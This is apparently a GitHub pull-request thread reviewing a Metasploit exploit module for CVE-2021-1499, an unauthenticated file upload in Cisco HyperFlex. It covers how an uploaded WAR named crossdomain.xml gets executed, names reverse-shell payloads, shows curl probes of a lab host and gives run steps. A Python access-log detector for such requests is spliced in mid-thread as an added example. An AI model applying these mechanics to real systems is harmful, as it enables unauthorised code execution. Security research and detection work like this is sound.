Cisco HyperFlex File Upload RCE #15333
Conversation
@msjenkins-r7 test this please.
Just left a few comments. If this is ready, I can move on to testing it once they're addressed. Looks good overall, nice work @jheysel-r7 !
@smcintyre-r7 Thanks for the review, much appreciated! Before wvu left for vacation they reminded me that we have native Java payloads. Wondering what your opinion is on switching from

Edit: Or adding functionality to support both?
Congrats on another module! Overall good job. Bye.
```ruby
  end

  def exploit
    app_base = 'crossdomain.xml'
```
FWIW, there are more discreet options that work with a Java payload.
I assume I need to find a payload that returns a shell automatically when it deploys itself in the tomcat7/webapps/ directory? That would remove the need to name the war file crossdomain.xml.war.

I named the directory crossdomain.xml due to the nginx configuration; if it's named anything else I don't think I'm able to execute what's inside, as I get a 301.

Success when the directory is named crossdomain.xml:
```
➜ metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/crossdomain.xml/pngynhbplt.jsp
* Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /crossdomain.xml/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:07:29 GMT
< Content-Type: text/html;charset=ISO-8859-1
< Content-Length: 6
< Connection: keep-alive
< Set-Cookie: JSESSIONID=9EDC41FB32DB4C8E66FDF87833703789; Path=/crossdomain.xml/; HttpOnly
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
```
Unsuccessful when named something else:
```
➜ metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
* Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /jsp_shell_reverse_tcp/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:06:17 GMT
< Content-Type: text/html
< Content-Length: 184
< Connection: keep-alive
< Location: https://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
```
I've tried the following Java payloads:

- java/meterpreter/reverse_tcp
- java/jsp_shell_reverse_tcp
- java/shell_reverse_tcp

and am unable to get a shell without naming the directory crossdomain.xml.

I might be making an incorrect assumption with regards to how I need to execute the payload once uploaded.
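The 200-versus-301 split in the two curl transcripts above is also what a defender can key on in the nginx access log: a `.jsp` answered under `/crossdomain.xml/` means a web app has been deployed under that name, and a `.jsp` elsewhere that nginx only redirects is a failed probe. The following is an added example, not code from the module or from this PR; it parses nginx combined-format log lines (constructed sample data, with documentation-range IPs) and returns the matching requests.

```python
import re
from dataclasses import dataclass

# Constructed nginx access-log lines in the default "combined" format: sample data
# written for this example, not logs taken from the PR or from a real host.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Jun/2021:18:07:20 +0000] "GET /crossdomain.xml HTTP/1.1" 200 271 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Jun/2021:18:07:29 +0000] "GET /crossdomain.xml/pngynhbplt.jsp HTTP/1.1" 200 6 "-" "curl/7.64.1"
192.0.2.10 - - [16/Jun/2021:18:06:17 +0000] "GET /jsp_shell_reverse_tcp/pngynhbplt.jsp HTTP/1.1" 301 184 "-" "curl/7.64.1"
192.0.2.11 - - [16/Jun/2021:18:08:01 +0000] "GET /ui/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
JSP_UNDER_POLICY_FILE = re.compile(r'^/crossdomain\.xml/[^?]*\.jsp(\?.*)?$', re.IGNORECASE)
ANY_JSP = re.compile(r'^[^?]*\.jsp(\?.*)?$', re.IGNORECASE)

@dataclass
class Finding:
    ip: str
    ts: str
    path: str
    status: int
    reason: str

def classify(path, status):
    """Return why a request is suspicious, or None if it looks benign."""
    # /crossdomain.xml is one static policy file; a .jsp *below* it is only answered when
    # Tomcat serves a web app deployed under that name. 200 = executed, otherwise a probe.
    if JSP_UNDER_POLICY_FILE.match(path):
        return 'jsp served under crossdomain.xml' if status == 200 else 'jsp probe under crossdomain.xml'
    # Elsewhere nginx only answers .jsp with a 301 to HTTPS (the failed case in the thread).
    if ANY_JSP.match(path) and status == 301:
        return 'jsp probe redirected by nginx'
    return None

def scan(log_text):
    """Parse combined-format lines and return the suspicious ones in file order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format access entry
        status = int(m['status'])
        reason = classify(m['path'], status)
        if reason:
            findings.append(Finding(m['ip'], m['ts'], m['path'], status, reason))
    return findings
```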
There are other nginx locations that work. I was using a payload servlet. Maybe we can go over the different approaches when I come back. :)
```ruby
    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml.war')
    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
```

If a way to change the name as discussed here is found, this will need to account for it.
After thorough testing I haven't been able to find a way to change the name of the file while still being able to execute it. I think these will stay as is.
FYI, these paths are incorrect, and `register_dir_for_cleanup` is preferred.

Commits 80287a4 to 90e8a6e:

- beta draft RCE working with linux/x64/meterpreter_reverse_tcp
- rubocop
- Updated title, removed newlines
- Responded to comments
- Rubo cop offenses
- Update documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md (Co-authored-by: wvu <wvu-r7@users.noreply.github.com>)
- Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb (Co-authored-by: wvu <wvu-r7@users.noreply.github.com>)
- Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb (Co-authored-by: wvu <wvu-r7@users.noreply.github.com>)
- Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb (Co-authored-by: wvu <wvu-r7@users.noreply.github.com>)
- Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb (Co-authored-by: wvu <wvu-r7@users.noreply.github.com>)
- Responded to comments
- Rubocop offenses
- Added support for Java Dropper
- Made changes to Linux Dropper
- Rubocop
- Improved check method, changed to default staged payload, removed TODO
- Switched to single-quoted strings

Commits 90e8a6e to 281fce0.
Just tested this one last time and confirmed it's working as intended. I tested both targets and the Linux dropper with both a staged and unstaged payload. Both did work, but the unstaged payload does seem slightly more reliable. Since that's the default value, it seems fine.
I'll have this landed in a moment, thanks @jheysel-r7 !

Release Notes: This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.

Excellent effort on this, @jheysel-r7. :)
Exploit module to leverage CVE-2021-1499: Unauthenticated file upload vulnerability in Cisco HyperFlex HX Data Platform.
Currently the module is set to use `linux/x64/meterpreter_reverse_tcp` by default. It uploads the war file to `/var/lib/tomcat7/webapps/`, the `.war` file gets auto deployed and then the module manually calls the `.jsp` file inside the deployed war file which sends a meterpreter session back to the user.

Potential Changes

It came to my attention during development that I'd likely be able to make use of a `java/meterpreter` payload. I'm going to continue investigating support for this.

Verification

List the steps needed to make sure this thing works

- `msfconsole`
- `use exploit/linux/http/cisco_hyperflex_file_upload_rce`
- `RHOSTS` and `LHOST`
- `run`

Demonstration